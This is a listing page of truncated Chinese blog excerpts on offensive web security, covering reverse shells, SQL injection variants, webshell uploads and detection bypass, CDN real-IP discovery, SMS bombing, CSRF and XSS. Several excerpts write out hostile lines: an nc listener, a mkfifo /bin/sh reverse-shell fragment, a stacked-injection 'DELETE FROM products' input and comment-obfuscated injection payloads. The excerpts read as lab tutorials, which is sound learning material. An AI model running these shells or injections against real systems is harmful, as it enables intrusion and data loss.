0x01 密码校验 启动 TeamServer 后,会创建 SecureServerSocket 对象并且循环调用 acceptAndAuthenticate 方法等待 Controller 连接在接收到信息并验证成功以后,才会去调用 clientAuthenticated 方法来线程执行 ManageUser 以处理与 Controller 的信息当 Controller 在点击
1 前景知识 通常来讲,通过cmd的ping或者nslookup命令,即能快速找到域名对应IP。但很多站点出于用户体验和安全的角度,使用CDN加速,将域名解析到CDN,这时候就需要绕过CDN来查找真实IP。那么什么是CDN? CDN全称为Content Delivery Network-内容分发网络。简单理解,资源服务器比作快递发货店家,CDN节点即为各个快递网点。快递网点会寄存一些店家的库存以方
一、bash反弹 ① 在kali机里面开启端口监听:nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用② 在目标主机上执行:python -c 'import pty;pty.spawn("/bin/bash")'二. -e 参数不可用在目标主机使用如下命令:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>
一、文件上传漏洞介绍 文件上传漏洞:在网站上传普通文件的位置,未对上传的文件进行严格的验证和过滤,导致可以通过绕过上传机制上传任意文件。进而导致用户可以通过上传WebShell(与网站后端语言一致)并执行从而控制服务器 文件上传漏洞的必备条件: 文件上传功能能正常使用:能够通过绕过上传机制上传想要上传的文件 上传文件保存的路径可知:上传文件时,网页通常会带有一个返回显示上传的文件,可以通过查看网页
1 二次注入 二次注入是指已存储(数据库、文件)的用户输入被读取后,再次进入到 SQL 查询语句中导致的注入。 过程如下: 1. 第一次插入恶意数据:在第一次进行数据库插入数据的时候,使用addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在后端代码中可能会被转义,但在存入数据库时还是原来的数据,数据中一般带有单引号和#号; 例如,
1 堆叠注入 1.1 堆叠注入成因 Sql查询语句中, 分号“;”代表查询语句的结束,所以在执行sql语句结尾分号的后面,再加一条sql语句,这个语句会一起执行,造成注入,这就是堆叠注入(Stacked Injection)。堆叠注入在mysql数据库中并不常见,常见于mssql数据库,mssql数据库是默认堆叠注入的。如用户输入:1; DELETE FROM products 服务器
1. 简介 网站通常都会通过如CDN、负载均衡器、或者反向代理来实现Web缓存功能。通过缓存频繁访问的文件,降低服务器响应延迟。例如,网站 htttp://www.example.com 配置了反向代理。对于那些包含用户个人信息的页面,如 http://www.example.com/home.php ,由于每个用户返回的内容有所不同,因此这类页面通常是动态生成,并不会在缓存服务器中进行缓存。通常
背景 WebShell绕过挑战赛,第一次参加这种比赛,因此对成功绕过的样本做了一些总结。 基本思路 在上传了一些样本做测试后,发现引擎(指伏魔Webshell检测引擎)对函数和函数的参数具有一定的敏感性。例如,array_map函数,它的第一个参数是传入一个回调函数,第二个参数是传入一个数组,作为回调函数的参数,测试时出现了以下四种情况。(black指被引擎发现,white指绕过引擎)array_
起因:同事A扫公司内网,发现某同事,6379端口开放---redis 看了看80端口也开放,还在玩pikachu经过同意开始我的测试,找到pikachu中的文件上传靶场---上传前端js校验禁掉直接上shell连接随便翻了翻几个盘发现这个C++目录有个1.exe2023年3月16日上传的,看来被已经被搞了好久了,还没发现还是做了简单免杀了还是4/70python制作简单免杀1.生成pay
一 漏洞原理 站点服务对短信验证接口未做严谨的校验导致恶意调用,向特定手机号连续发送验证码,实现轰炸效果 二 利用场景 经常被灰产从业者利用提供给催收,报复,骚扰等等三 常见位置 1.注册,登录,找回密码,修改密码 2.重要操作验证位置(如:验证身份,活动领取,签署合同,支付二次验证等) 四:挖掘姿势 1.重复发包 因为短信接口get请求,未作任何限制重复发包即可达到效果2.参数污染修改一些参数值
盲注的本质是猜解(所谓 “盲” 就是在看不到返回数据的情况下能通过 “感觉” 来判断),那能感觉到什么?答案是:差异(包括运行时间的差异和页面返回结果的差异)。也就是说想实现的是要构造一条语句来测试输入的布尔表达式,使得布尔表达式结果的真假直接影响整条语句的执行结果,从而使得系统有不同的反应,在时间盲注中是不同的返回的时间,在布尔盲注中则是不同的页面反应。如上所述,这种猜测的过程使得盲注得名。在盲
Sql注入如果按数据提交方式进行分类,则有HTTP的 :1)GET注入 2)POST注入 3)HEADER注入 1 GET注入 GET 的语义是从服务器获取指定的资源,这个资源可以是静态的文本、页面、图片视频等。GET请求的参数位置一般是写在 URL中。 数据以get的方式进行提交,注入点一般在get提交的url的参数后,可以通过Burpsuite抓包进行查找。http://127.0.0.1/L
1 CSRF原理 CSRF, Cross-site request forgery,即“跨站请求伪造”,是指攻击者可能利用网页中的恶意代码强迫受害者浏览器向被攻击的Web站点发送伪造的请求,篡夺受害者的认证Cookie等身份信息,从而假冒受害者对目标站点执行指定的操作。 简单来讲,CSRF 攻击就是黑客冒用用户身份并通过第三方的站点执行非法操作。这种攻击我们也称为“One Click
1. 前言当在进行手工注入时,有时候会发现构造的危险字符被过滤了,接下来使用墨者学院的在线靶场直接开始。2. 判断注入点通过测试发现,这里过滤了空格和等于号。所以用/**/代替空格,用like代替=,最后将构造的语句进行url编码,使用的是小葵转化工具。所以咱们构造如下语句。//and//1//like//1结果如下图,页面正常显示。接着再构造如下语句。/**/and/**/1/**/like/*
1. 前言分享实战笔记为Access注入,实战环境使用的是墨者学院的在线靶场。通过网上公开靶场提升我们学习的知识点,并且一步一步提高技能及实战化。2. 判断注入点通过‘ 或者 and 1=1 和 and 1=2 是否报错,如下图。接下来咱们输入 and 1=2 发现报错了,说明存在注入点,如下图。3. 猜数据库表名在Access数据库中,打开里面直接就是表,所以只能猜表名,通过这条语句 and e
1. 前言 首先对sql server进行初步的了解。常用的全部变量 @@version:返回当前的Sql server安装的版本、处理器体系结构、生成日期和操作系统。 @@servername:放回运行Sql server的本地服务器名称 top在sql server,没有MySQL中的limit控制符,如果实现limit控制符功能则可以使用top进行代替。2. 正文 如果对方网站管理员没有关闭
1.XSS简介跨站脚本攻ji(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻ji者嵌入恶意脚本代码(一般是JS代码)到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻ji用户的目的。它常常与其他漏洞一起造成破坏性的后果。2.XSS的分类XSS漏洞表现为多种形式,并且分为三种类型:反射型、储存型,DOM型。这些有一些相同的特点,但是在如何
1 前言通常再一个web程序中,一般会存在登陆注册功能,登陆后一般会有上传头像等功能,如果上传验证不严格就可能造成恶意第三方直接上传马,进而控制整个web业务控制权。下面通过实例,如果程序只进行了客户端JavaScript检测,咱们如何来绕过。2 正文2.1 客户端后缀检测工具准备:DVWA程序,burpsuite,中国菜刀。首先本地创建一个.txt文档,里面写入一句话马,然后将后缀名改为.php
mysql注入
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号